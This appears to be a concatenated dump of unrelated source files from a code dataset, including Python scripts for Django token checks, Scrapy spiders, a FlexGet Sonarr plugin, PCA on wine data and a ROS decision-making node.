Error[014]: ocurred in remove_rptd_wrds on row no: ', index)\r\n \r\n normalized_corpus.append(doc)\r\n print('--> preprocessing completed') \r\n return normalized_corpus\r\n \r\n\r\n\r\ndef preprocess(pData, pTktDesc, pCol):\r\n pData.columns = pData.columns.str.lower() \r\n pData = pData.applymap(str)\r\n \r\n pData = col_keyword(pData, pTktDesc, pCol)\r\n pData = pData.dropna(subset = [pTktDesc]) \r\n try:\r\n norm_corpus = normalize_corpus(corpus=pData[pTktDesc], html_stripping=True, contraction_expansion=True, \r\n accented_char_removal=True, text_lower_case=True, text_lemmatization=True, \r\n text_stemming=False, special_char_removal=True, remove_digits=True,\r\n custm_stpwrds= True,stopword_removal=True, ewords = True, stopwords=stopword_list,\r\n eng_words = engwords)\r\n except Exception as e:\r\n print('Error ocurred due to template')\r\n return(-1)\r\n \r\n pData['Sample'] = norm_corpus\r\n\r\n return (0,pData) \r\n \r\n\r\n\r\n\r\n\r\n","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":12012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"392994674","text":"# encoding:utf-8\n\nfrom rest_framework import permissions\nfrom rest_framework.request import Request as rfRequest\nfrom rest_framework.authentication import BaseAuthentication\nfrom api.models import customer_auth\nfrom rest_framework import HTTP_HEADER_ENCODING, exceptions\nfrom django.core.cache import cache\nfrom django.core.handlers.wsgi import WSGIRequest\nimport datetime\n\ndef checkToken(func):\n def wrapper(request, *args, **kwargs):\n token = None\n if isinstance(request, WSGIRequest):\n if 'token' in request.GET.keys():\n token = request.GET['token']\n elif 'token' in request.POST.keys():\n token = request.POST['token']\n elif isinstance(request, rfRequest):\n params = _get_parameter_dic(request)\n if 'token' in params.keys():\n token = params['token']\n else:\n if 'token' in kwargs.keys():\n token = kwargs['token']\n else:\n if len(args) == 1:\n params = _get_parameter_dic(args[0])\n if 'token' in params.keys():\n token = params['token']\n else:\n for arg in args:\n params = _get_parameter_dic(arg)\n if 'token' in params.keys():\n token = params['token']\n break\n if token is None:\n return HttpResponse(\n json.dumps({\n \"result\": False,\n \"data\": [],\n \"desc\": u\"请先登陆\",\n \"code\": 403\n }, ensure_ascii=False), content_type='application/json')\n return JsonResponse(code=403, desc=u'请先登陆')\n try:\n token = customer_auth.objects.get(token=token)\n if not token.checkToken():\n return HttpResponse(\n json.dumps({\n \"desc\": u\"Token已过期\",\n \"code\": 403\n }, ensure_ascii=False), content_type='application/json')\n return JsonResponse(code=403, desc=u'Token已过期')\n else:\n request.login_user = token.customer\n except customer_auth.DoesNotExist:\n return HttpResponse(\n json.dumps({\n \"desc\": u\"Token信息不正确\",\n \"code\": 403\n }, ensure_ascii=False), content_type='application/json')\n return JsonResponse(code=403, desc=u'Token信息不正确')\n except Exception as e:\n return HttpResponse(\n json.dumps({\n \"desc\": u\"Token信息不正确\",\n \"code\": 403\n }, ensure_ascii=False), content_type='application/json')\n return JsonResponse(code=403, desc=u'Token信息不正确')\n return func(request, *args, **kwargs)\n return wrapper\n\n\n\ndef _get_parameter_dic(request, *args, **kwargs):\n '''\n 统一处理参数\n '''\n from django.http import QueryDict\n from rest_framework.request import Request\n\n if isinstance(request, Request) == False:\n return {}\n\n query_params = request.query_params\n if isinstance(query_params, QueryDict):\n query_params = query_params.dict()\n result_data = request.data\n if isinstance(result_data, QueryDict):\n result_data = result_data.dict()\n\n if query_params != {}:\n return query_params\n else:\n return result_data\n","sub_path":"foods/apps/api/permission.py","file_name":"permission.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"610243892","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#\n# Copyright 2019 The FATE Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom federatedml.util import consts\nfrom federatedml.param.base_param import BaseParam\n\n\nclass PositiveUnlabeledParam(BaseParam):\n \"\"\"\n Parameters used for positive unlabeled.\n ----------\n strategy: {\"probability\", \"quantity\", \"proportion\", \"distribution\"}\n The strategy of converting unlabeled value.\n\n threshold: int or float, default: 0.9\n The threshold in labeling strategy.\n \"\"\"\n\n def __init__(self, strategy=\"probability\", threshold=0.9):\n super(PositiveUnlabeledParam, self).__init__()\n self.strategy = strategy\n self.threshold = threshold\n\n def check(self):\n base_descr = \"Positive Unlabeled Param's \"\n float_descr = \"Probability or Proportion Strategy Param's \"\n int_descr = \"Quantity Strategy Param's \"\n numeric_descr = \"Distribution Strategy Param's \"\n\n self.check_valid_value(self.strategy, base_descr,\n [consts.PROBABILITY, consts.QUANTITY, consts.PROPORTION, consts.DISTRIBUTION])\n\n self.check_defined_type(self.threshold, base_descr, [consts.INT, consts.FLOAT])\n\n if self.strategy == consts.PROBABILITY or self.strategy == consts.PROPORTION:\n self.check_decimal_float(self.threshold, float_descr)\n\n if self.strategy == consts.QUANTITY:\n self.check_positive_integer(self.threshold, int_descr)\n\n if self.strategy == consts.DISTRIBUTION:\n self.check_positive_number(self.threshold, numeric_descr)\n\n return True\n","sub_path":"python/federatedml/param/positive_unlabeled_param.py","file_name":"positive_unlabeled_param.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"622961727","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport tornado.ioloop\nimport tornado.web\nimport re\nclass MainForm(object):\n def __init__(self):\n self.host = \"(.*)\"\n self.ip = \"^(25[0-5]|2[0-4]\\d|[0-1]?\\d?\\d)(\\.(25[0-5]|2[0-4]\\d|[0-1]?\\d?\\d)){3}$\"\n self.port = \"(\\d+)\"\n self.phone = \"^1[3|4|5|8][0-9]\\d{$}$\"\n def check_valid(self,handle):\n flag = True\n value_dict ={}\n for key,regular in self.__dict__.items():\n input_value = handle.get_argument(key)\n val = re.match(regular,input_value)\n print(key,input_value, val, regular)\n if not val:\n flag =False\n value_dict[key]=input_value\n return flag, value_dict\n\nclass IndexHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"index.html\")\n def post(self, *args, **kwargs):\n obj = MainForm()\n is_valid,value_dict = obj.check_valid(self)\n print(is_valid)\n if is_valid:\n print(value_dict)\n\nsettings = {\n 'templates':'view',#模板路劲的配置\n 'static_path': 'static',#静态文件的路径\n 'static_url_prefix': '/sss/',#路劲前缀知道即可\n}\n\napplication = tornado.web.Application([\n (r\"/index\", IndexHandler),\n],**settings)\n\nif __name__ == \"__main__\":\n #socket运行起来了\n application.listen(8888)\n tornado.ioloop.IOLoop.instance().start()","sub_path":"PycharmProjects/learn/day_15_checkform/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"426898194","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\nfrom scrapy.exceptions import DropItem\nfrom elasticsearch_dsl.connections import connections\nfrom ftptree2es import settings\n\nconnections.create_connection(hosts=['http://elastic:xxxxxx@yyyyyy:9200/'])\n\nclass Ftptree2EsPipeline:\n @classmethod\n def from_crawler(cls,crawler):\n cls.connection_string = crawler.settings.get('ELASTICSEARCH_CONNECTION_STRING')\n cls.index = crawler.settings.get('ELASTICSEARCH_INDEX')\n return cls()\n\n def process_item(self, item, spider):\n item.save_to_es()\n return item\n","sub_path":"ftptree2es/ftptree2es/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"458469408","text":"from db import dbConnect\nfrom decouple import config\n\nclass Migrations:\n\n database = config('DB_DATABASE')\n\n def createDatabase(self):\n\n database = Migrations.database\n conn = dbConnect().getConnection()\n mycursor = conn.cursor()\n\n ## check table is exists or not\n mycursor.execute(\"SHOW DATABASES\")\n dbnames = []\n for x in mycursor:\n dbnames.append(x[0])\n\n ###not exist table then create db\n if database not in dbnames:\n mycursor.execute(\"CREATE DATABASE \"+database)\n print(database +\" DATABASE CREATED SUCCESSFULLY\")\n\n else:\n print(database +\" DATABASE ALREADY EXISTS\")\n\n conn.close()\n\n def createTable(self):\n conn = dbConnect().connectDB()\n mycursor = conn.cursor()\n\n ## check table is exists or not\n mycursor.execute(\"SHOW TABLES\")\n dbtables = []\n for x in mycursor:\n dbtables.append(x[0])\n\n ###not exist table then create db\n if 'random_results' not in dbtables:\n mycursor.execute(\"CREATE TABLE random_results (id INT AUTO_INCREMENT PRIMARY KEY, random_number INT(2), result_1 VARCHAR(15), result_2 VARCHAR(15))\")\n print(\"random_results TABLE CREATED SUCCESSFULLY\")\n print(\"Migrations Completed\")\n\n else:\n print(\"random_results TABLE ALREADY EXISTS\")\n print(\"No Migrations\")\n\n conn.close()\n\nmo = Migrations()\n### create db\nmo.createDatabase()\n### create db table\nmo.createTable()\n","sub_path":"scripts/migrations.py","file_name":"migrations.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"60401160","text":"#!/usr/bin/python\r\nimport sys\r\n\r\nbuilding_temps = {}\r\nhigh_temps = {}\r\nfor line in sys.stdin:\r\n line = line.strip()\r\n print(line)\r\n Time, TargetTemp, ActualTemp, BuildingID, sys_bID = line.split('\\t')\r\n Time = Time.split(':')\r\n \r\n temp_difference = abs(int(TargetTemp) - int(ActualTemp))\r\n if sys_bID in building_temps:\r\n building_temps[sys_bID].append(int(temp_difference))\r\n else:\r\n building_temps[sys_bID] = []\r\n building_temps[sys_bID].append(int(temp_difference))\r\n\r\n try:\r\n hours = int(Time[0])\r\n except ValueError:\r\n continue\r\n\r\n if hours > 8 and hours < 17:\r\n if BuildingID in high_temps:\r\n high_temps[BuildingID].append(int(ActualTemp))\r\n else:\r\n high_temps[BuildingID] = []\r\n high_temps[BuildingID].append(int(ActualTemp))\r\n else:\r\n continue\r\n\r\nresults = {}\r\nfor sys_bID in building_temps.keys():\r\n avg_temp_diffs = sum(building_temps[sys_bID]) * 1.0 / len(building_temps[sys_bID])\r\n\r\n if sys_bID in results:\r\n results[sys_bID].append(avg_temp_diffs)\r\n else:\r\n results[sys_bID] = []\r\n results[sys_bID].append(avg_temp_diffs)\r\n\r\nsorted_results = sorted(results.items(), key=lambda x: x[1])\r\nfor x in list(reversed(list(sorted_results)))[0:3]:\r\n print(x)\r\n\r\n# averages\r\nbuilding_temps = {}\r\nfor BuildingID in high_temps.keys():\r\n avg_high_temps = sum(high_temps[BuildingID]) * 1.0 / len(high_temps[BuildingID])\r\n if BuildingID in building_temps:\r\n building_temps[BuildingID].append(avg_high_temps)\r\n else:\r\n building_temps[BuildingID] = []\r\n building_temps[BuildingID].append(avg_high_temps)\r\n\r\nsorted_building_temps = sorted(building_temps.items(), key=lambda x: x[1])\r\nfor x in list(reversed(list(sorted_building_temps)))[0:3]:\r\n print(x)","sub_path":"PA3/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"281394969","text":"import webapp2\nimport os \nfrom google.appengine.ext import db\nfrom google.appengine.ext.webapp import template\n\nclass Counter(db.Model):\n count = db.IntegerProperty(required=True, default=0)\n \nclass MainPage(webapp2.RequestHandler):\n def get(self):\n \n a=Counter.get_by_key_name('http://learn355127.appspot.com/')\n if a is None:\n a=''\n \n b=Counter.get_by_key_name('http://video.eyny.com/index.php/video/show/cid/69/order/2/page/3DN3C67C.html')\n if b is None:\n b=''\n template_values = {'aaaa':a ,'b':b}\n render(self,'main.html',template_values)\n \nclass Read(webapp2.RequestHandler):\n def get(self):\n p = self.request.get('pid')\n \n pkon= Counter.get_by_key_name(p)\n if pkon is None:\n pkon = Counter(key_name=p)\n pkon.count =pkon.count+ 1\n pkon.put()\n self.redirect(str(p))\n\ndef render(handler, renderFile, templateValues={}): \n path = os.path.join(os.path.dirname(__file__), 'templates/', renderFile) \n handler.response.out.write(template.render(path, templateValues)) \n\napp = webapp2.WSGIApplication([('/', MainPage),\n ('/read', Read)\n ],\n debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"404043520","text":"from __future__ import unicode_literals, division, absolute_import\nfrom urlparse import urlparse\nimport logging\nfrom requests import RequestException\n\nfrom flexget import plugin\nfrom flexget.event import event\nfrom flexget.entry import Entry\n\nlog = logging.getLogger('sonarr')\n\n\nclass Sonarr(object):\n schema = {\n 'type': 'object',\n 'properties': {\n 'base_url': {'type': 'string'},\n 'port': {'type': 'number', 'default': 80},\n 'api_key': {'type': 'string'},\n 'include_ended': {'type': 'boolean', 'default': True},\n 'only_monitored': {'type': 'boolean', 'default': True},\n 'include_data': {'type': 'boolean', 'default': False}\n },\n 'required': ['api_key', 'base_url'],\n 'additionalProperties': False\n }\n\n def transalte_quality(self, quality_name):\n \"\"\"\n Translate Sonnar's qualities to ones recognize by Flexget\n \"\"\"\n if quality_name == 'Raw-HD': # No better match yet in Flexget\n return 'remux'\n elif quality_name == 'DVD': # No better match yet in Flexget\n return 'dvdrip'\n else:\n return quality_name.replace('-', ' ').lower()\n\n def quality_requirement_builder(self, quality_profile):\n\n allowed_qualities = [self.transalte_quality(quality['quality']['name']) for quality in quality_profile['items']\n if quality['allowed']]\n cutoff = self.transalte_quality(quality_profile['cutoff']['name'])\n\n return allowed_qualities, cutoff\n\n def on_task_input(self, task, config):\n \"\"\"\n This plugin returns ALL of the shows monitored by Sonarr.\n Return ended shows by default and does not return unmonitored\n show by default.\n\n Syntax:\n\n sonarr:\n base_url=\n port=\n api_key=\n include_ended=\n only_monitored=\n include_data=\n\n Options base_url and api_key are required.\n\n Use with input plugin like discover and/or configure_series.\n Example:\n\n download-tv-task:\n configure_series:\n settings:\n quality:\n - 720p\n from:\n sonarr:\n base_url: http://localhost\n port: 8989\n api_key: MYAPIKEY1123\n discover:\n what:\n - emit_series: yes\n from:\n torrentz: any\n download:\n /download/tv\n\n Note that when using the configure_series plugin with Sonarr\n you are basically synced to it, so removing a show in Sonarr will\n remove it in flexget as well,which good be positive or negative,\n depending on your usage.\n \"\"\"\n parsedurl = urlparse(config.get('base_url'))\n url = '%s://%s:%s%s/api/series' % (parsedurl.scheme, parsedurl.netloc, config.get('port'), parsedurl.path)\n headers = {'X-Api-Key': config['api_key']}\n try:\n json = task.requests.get(url, headers=headers).json()\n except RequestException as e:\n raise plugin.PluginError('Unable to connect to Sonarr at %s://%s:%s%s. Error: %s'\n % (parsedurl.scheme, parsedurl.netloc, config.get('port'),\n parsedurl.path, e))\n entries = []\n # Retrieves Sonarr's profile list if include_data is set to true\n if config.get('include_data'):\n url2 = '%s://%s:%s%s/api/profile' % (parsedurl.scheme, parsedurl.netloc, config.get('port'), parsedurl.path)\n try:\n profiles_json = task.requests.get(url2, headers=headers).json()\n except RequestException as e:\n raise plugin.PluginError('Unable to connect to Sonarr at %s://%s:%s%s. Error: %s'\n % (parsedurl.scheme, parsedurl.netloc, config.get('port'),\n parsedurl.path, e))\n for show in json:\n fg_qualities = '' # Initializes the quality parameter\n fg_cutoff = ''\n path = None\n if not show['monitored'] and config.get('only_monitored'): # Checks if to retrieve just monitored shows\n continue\n if show['status'] == 'ended' and not config.get('include_ended'): # Checks if to retrieve ended shows\n continue\n if config.get('include_data') and profiles_json: # Check if to retrieve quality & path\n path = show.get('path')\n for profile in profiles_json:\n if profile['id'] == show['profileId']: # Get show's profile data from all possible profiles\n fg_qualities, fg_cutoff = self.quality_requirement_builder(profile)\n entry = Entry(title=show['title'],\n url='',\n series_name=show['title'],\n tvdb_id=show.get('tvdbId'),\n tvrage_id=show.get('tvRageId'),\n tvmaze_id=show.get('tvMazeId'),\n configure_series_target=fg_cutoff)\n if len(fg_qualities) > 1:\n entry['configure_series_qualities'] = fg_qualities\n elif len(fg_qualities) == 1:\n entry['configure_series_quality'] = fg_qualities[0]\n else:\n entry['configure_series_quality'] = fg_qualities\n if path:\n entry['configure_series_path'] = path\n if entry.isvalid():\n entries.append(entry)\n else:\n log.error('Invalid entry created? %s' % entry)\n continue\n # Test mode logging\n if entry and task.options.test:\n log.verbose(\"Test mode. Entry includes:\")\n for key, value in entry.items():\n log.verbose(' {}: {}'.format(key.capitalize(), value))\n\n return entries\n\n\n@event('plugin.register')\ndef register_plugin():\n plugin.register(Sonarr, 'sonarr', api_ver=2)\n","sub_path":"flexget/plugins/input/sonarr.py","file_name":"sonarr.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"253040716","text":"words = set()\nfor _ in range(int(input())):\n words.update(input().split())\nprint(words)\n\n\nOR\n\nn=int(input())\ns=\"\"\nfor i in range(n):\n\ts2=input()\n\ts=s+\" \"+s2\nl=s.split()\ns4=set(l)\nprint(len(s4))","sub_path":"number of distinct words in some text.py","file_name":"number of distinct words in some text.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"453833485","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 4 07:50:41 2016\n\n@author: Ryan\n\"\"\"\n\n\"Principal Component Analysis\"\n\n\"Read in data\"\nimport pandas as pd\ndf_wine = pd.read_csv('http://archive.ics.uci.edu/ml/machine-learning-databases/wine/wine.data',\n header=None)\n\n\"Separate dataset into training and test sets (70/30). Standardize it.\"\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nX, y = df_wine.iloc[:, 1:].values, df_wine.iloc[:, 0].values\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n\nsc=StandardScaler()\nX_train_std = sc.fit_transform(X_train)\nX_test_std = sc.fit_transform(X_test)\n\n\"Construct covariance matrix and find eigenvalues and eigenvectors\"\nimport numpy as np\ncov_mat = np.cov(X_train_std.T)\neigen_vals, eigen_vecs = np.linalg.eig(cov_mat)\nprint('\\nEigenvalues \\n%s' % eigen_vals)\n\n\"Plotting variance explained ratios of the eigenvalues (eig_i/sum of all eig_vals)\"\n\ntot = sum(eigen_vals)\nvar_exp = [(i/tot) for i in sorted(eigen_vals, reverse=True)]\ncum_var_exp = np.cumsum(var_exp)\n\nimport matplotlib.pyplot as plt\nplt.bar(range(1,14), var_exp, alpha=0.5, align='center', label='individual explained variance')\nplt.step(range(1,14), cum_var_exp, where='mid',\n label='cumulative explained variance')\nplt.ylabel('Explained variance ratio')\nplt.xlabel('Principal components')\nplt.legend(loc='best')\nplt.show()\n\n\"Sort eigenpairs by decreasing order of eigenvalues\"\neigen_pairs = [(np.abs(eigen_vals[i]), eigen_vecs[:, i]) for i in range(len(eigen_vals))]\neigen_pairs.sort(reverse=True)\n\n\"\"\"Collect the two eigenvecors that explain ~60% of variance (this is for illustrative\npurposes; normally number of eigenvectors depends on trade-off btwn computational\nefficiency and performance)\nThe resulting matrix is our transformation matrix\"\"\"\n\nw = np.hstack((eigen_pairs[0][1][:, np.newaxis],\n eigen_pairs[1][1][:, np.newaxis]))\nprint('Matrix W: \\n', w)\n\n\"Now transform the original dataset onto two principal components X' = XW\"\nX_train_pca = X_train_std.dot(w)\n\n\"And plot the dataset on PC1xPC2 coordinates\"\ncolors = ['r', 'b', 'g']\nmarkers = ['s', 'x', 'o']\nfor l, c, m in zip(np.unique(y_train), colors, markers):\n plt.scatter(X_train_pca[y_train==l, 0],\n X_train_pca[y_train==l, 1],\n c=c, label=l, marker=m)\nplt.xlabel('PC 1')\nplt.ylabel('PC 2')\nplt.legend(loc='lower left')\nplt.show()\n\n\n","sub_path":"PCA.py","file_name":"PCA.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"290886273","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom scrapy.spiders import Spider\nfrom scrapy.spiders import Request\nimport json\nfrom hexun.items import HexunItem\nfrom utils.urlUtils import UrlUtils\nfrom utils.dateTimeUtils import DateTimeUtils\n\nclass MASpider(Spider):\n name = 'ma'\n urlTemplate='http://webftcn.hermes.hexun.com/shf/minute?code=CZCEma{0}&start={1}&number=570&t=1513836362966'\n start_urls = [\n\n ]\n allowed_domains = ['*.hexun.com']\n\n def start_requests(self):\n contractList = DateTimeUtils.getContractList()\n for contract in contractList:\n url = self.urlTemplate.format(contract, DateTimeUtils.getStartTime())\n yield Request(url=url, callback=self.parseItem)\n\n def parseItem(self, response):\n jsonData = json.loads(response.body_as_unicode().strip(';').strip('(').strip(')'))\n datas = jsonData['Data'][0]\n contractCode=self.getContractName(response)\n for dataItem in datas:\n lldpeItem = HexunItem()\n lldpeItem['product'] = contractCode\n lldpeItem['dateTime'] = dataItem[0]\n lldpeItem['price'] = dataItem[1]\n lldpeItem['amount'] = dataItem[2]\n lldpeItem['volumn'] = dataItem[3]\n lldpeItem['avePrice'] = dataItem[4]\n lldpeItem['openInterest'] = dataItem[5]\n yield lldpeItem\n\n def getContractName(self, response):\n code = UrlUtils.getQueryValue(response.url, 'code')[-4:]\n return self.name + code\n","sub_path":"hexun/hexun/spiders/maSpider.py","file_name":"maSpider.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"160406676","text":"#!/usr/bin/env python\n\nimport rospy\nimport tf\nfrom pi_trees_ros.pi_trees_ros import *\nfrom pi_trees_lib.task_setup import *\nimport referee_pb2\n\nrospy.init_node('decision_maker') # write this line before import GlobalData\n\nimport GlobalData\nimport Halt\nimport Stopgame\nimport Forcestart\nimport KickoffFriend\nimport KickoffEnemy\nimport PenaltyFriend\nimport PenaltyEnemy\nimport IndirectFriend\nimport IndirectEnemy\nimport DirectFriend\nimport DirectEnemy\nimport TimeoutFriend\nimport TimeoutEnemy\nimport GoalFriend\nimport GoalEnemy\n\nimport geometry_msgs.msg\nimport std_msgs.msg\nfrom tf.transformations import quaternion_from_euler\nfrom std_msgs.msg import Int8\nfrom std_msgs.msg import Float32\nfrom std_msgs.msg import String\nfrom nav_msgs.msg import Odometry\nfrom roots_msgs.msg import nodeData\nfrom roots_msgs.msg import nodeDataArray\n\n\ndef publish():\n header = std_msgs.msg.Header()\n header.stamp = rospy.Time.now()\n header.frame_id = 'map'\n\n if GlobalData.GlobalData.is_velocity_control:\n msg = geometry_msgs.msg.TwistStamped()\n msg.header = header\n msg.twist = GlobalData.GlobalData.target_velocity\n pub_velocity.publish(msg)\n pub_control_mode.publish(std_msgs.msg.String('velocity'))\n\n else:\n send_pose = GlobalData.GlobalData.tf_listener.transformPose('map', GlobalData.GlobalData.target_pose)\n send_pose.header.stamp = rospy.Time.now()\n pub_position.publish(send_pose)\n pub_control_mode.publish(std_msgs.msg.String('position'))\n\n pub_kick_velocity.publish(std_msgs.msg.Float32(GlobalData.GlobalData.kick_velocity))\n \n pub_nodes.publish(G_nodeArray)\n\n\ndef refboxCallback(msg):\n global global_data\n global_data.setRefCommand(msg.data)\n\n\ndef ballCallback(msg):\n global global_data\n global_data.setBallInfo(msg)\n\n\ndef logChildren(parent):\n for child in parent.children:\n node = nodeData()\n node.parentName = parent.name\n node.myName = child.name\n node.myType = child.node_type\n if child.status is None:\n node.myStatus = 3\n else:\n node.myStatus = child.status\n\n global G_nodeArray\n G_nodeArray.nodes.append(node)\n\n logChildren(child)\n\ndef main():\n # plays\n halt = Halt.Halt('Halt')\n stop_game = Stopgame.Stopgame('Stop game')\n force_start = Forcestart.Forcestart('Force start')\n kickoff_friend = KickoffFriend.KickoffFriend('KickoffFriend')\n kickoff_enemy = KickoffEnemy.KickoffEnemy('KickoffEnemy')\n penalty_friend = PenaltyFriend.PenaltyFriend('PenaltyFriend')\n penalty_enemy = PenaltyEnemy.PenaltyEnemy('PenaltyEnemy')\n indirect_friend = IndirectFriend.IndirectFriend('IndirectFriend')\n indirect_enemy = IndirectEnemy.IndirectEnemy('IndirectEnemy')\n direct_friend = DirectFriend.DirectFriend('DirectFriend')\n direct_enemy = DirectEnemy.DirectEnemy('DirectEnemy')\n timeout_friend = TimeoutFriend.TimeoutFriend('TimeoutFriend')\n timeout_enemy = TimeoutEnemy.TimeoutEnemy('TimeoutEnemy')\n goal_friend = GoalFriend.GoalFriend('GoalFriend')\n goal_enemy = GoalEnemy.GoalEnemy('GoalEnemy')\n\n behavior_tree = Selector(\"Behavior\")\n behavior_tree.add_child(halt)\n behavior_tree.add_child(stop_game)\n behavior_tree.add_child(force_start)\n\n behavior_tree.add_child(kickoff_friend)\n behavior_tree.add_child(kickoff_enemy)\n\n behavior_tree.add_child(penalty_friend)\n behavior_tree.add_child(penalty_enemy)\n\n behavior_tree.add_child(indirect_friend)\n behavior_tree.add_child(indirect_enemy)\n\n behavior_tree.add_child(direct_friend)\n behavior_tree.add_child(direct_enemy)\n\n behavior_tree.add_child(timeout_friend)\n behavior_tree.add_child(timeout_enemy)\n\n behavior_tree.add_child(goal_friend)\n behavior_tree.add_child(goal_enemy)\n\n\n r = rospy.Rate(10)\n\n print_tree(behavior_tree, 0, True)\n\n while not rospy.is_shutdown():\n behavior_tree.run()\n r.sleep()\n\n logChildren(behavior_tree)\n\n publish()\n global G_nodeArray\n G_nodeArray.nodes = []\n\n rospy.loginfo('==========================')\n\n\n\nif __name__ == '__main__':\n\n pub_control_mode = rospy.Publisher('/robot_0/roots_2dnav_pid/control_mode', std_msgs.msg.String, queue_size=10)\n pub_position = rospy.Publisher('/robot_0/move_base_simple/goal', geometry_msgs.msg.PoseStamped, queue_size=10)\n pub_velocity = rospy.Publisher('/robot_0/move_base_simple/target_velocity', geometry_msgs.msg.TwistStamped, queue_size=10)\n pub_kick_velocity = rospy.Publisher('/robot_0/kick_velocity', std_msgs.msg.Float32, queue_size=10)\n\n pub_nodes = rospy.Publisher('node_data_array',nodeDataArray,queue_size=10)\n # Subscriber\n sub_refbox_command = rospy.Subscriber(\"/refbox/command\", Int8, refboxCallback)\n sub_ball = rospy.Subscriber(\"/ball_observer/estimation\", Odometry, ballCallback)\n\n friend_color = rospy.get_param(\"/friend_color\")\n\n global_data = GlobalData.GlobalData()\n GlobalData.GlobalData.setFriendColor(friend_color)\n\n G_nodeArray = nodeDataArray()\n\n main()\n","sub_path":"roots_decision_making/scripts/roots_decision_making_node.py","file_name":"roots_decision_making_node.py","file_ext":"py","file_size_in_byte":5147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"598383248","text":"# -*- coding: utf-8 -*-\n\n\"\"\"An extension to Flask-SQLAlchemy.\"\"\"\n\nfrom __future__ import annotations\n\nimport logging\n\nfrom flask import Flask, current_app\nfrom flask_security import SQLAlchemyUserDatastore\nfrom flask_sqlalchemy import SQLAlchemy\nfrom werkzeug.local import LocalProxy\n\nfrom ..manager import WebManager\nfrom ..models import User\n\n__all__ = [\n 'PyBELSQLAlchemy',\n 'manager',\n 'user_datastore',\n]\n\nlogger = logging.getLogger(__name__)\n\n\nclass PyBELSQLAlchemy(SQLAlchemy):\n \"\"\"An extension of Flask-SQLAlchemy to support the BEL Commons manager.\"\"\"\n\n def init_app(self, app: Flask) -> None:\n \"\"\"Initialize a Flask app.\"\"\"\n super().init_app(app)\n\n with app.app_context():\n _manager = app.extensions['manager'] = WebManager(engine=self.engine, session=self.session)\n _manager.bind()\n\n _admin = _manager.user_datastore.find_or_create_role('admin')\n\n _butler_email = app.config['BUTLER_EMAIL']\n _butler_name = app.config['BUTLER_EMAIL']\n _butler_password = app.config['BUTLER_EMAIL']\n _butler: User = _manager.user_datastore.find_user(email=_butler_email)\n if _butler is not None:\n logger.debug('butler user: %s', _butler)\n if _butler is None:\n logger.info('creating user: %s (%s)', _butler_name, _butler_email)\n _manager.user_datastore.create_user(\n email=_butler_email,\n name=_butler_name,\n password=_butler_password,\n )\n _manager.user_datastore.commit()\n\n _manager.sanitize(user=_butler, public=app.config['DISALLOW_PRIVATE'])\n\n\ndef _get_manager() -> WebManager:\n \"\"\"Get the manager from the app.\"\"\"\n _manager = current_app.extensions.get('manager')\n if _manager is None:\n raise RuntimeError(\n 'The manager was not registered to the app yet.'\n ' Make sure to call PyBELSQLAlchemy.init_app()',\n )\n return _manager\n\n\ndef _get_user_datastore() -> SQLAlchemyUserDatastore:\n return _get_manager().user_datastore\n\n\nmanager: WebManager = LocalProxy(_get_manager)\nuser_datastore: SQLAlchemyUserDatastore = LocalProxy(_get_user_datastore)\nbutler = LocalProxy(lambda: user_datastore.find_user(email=current_app.config['BUTLER_EMAIL']))\n","sub_path":"src/bel_commons/core/sqlalchemy.py","file_name":"sqlalchemy.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"85783287","text":"import os\nimport json\nimport cv2\nimport 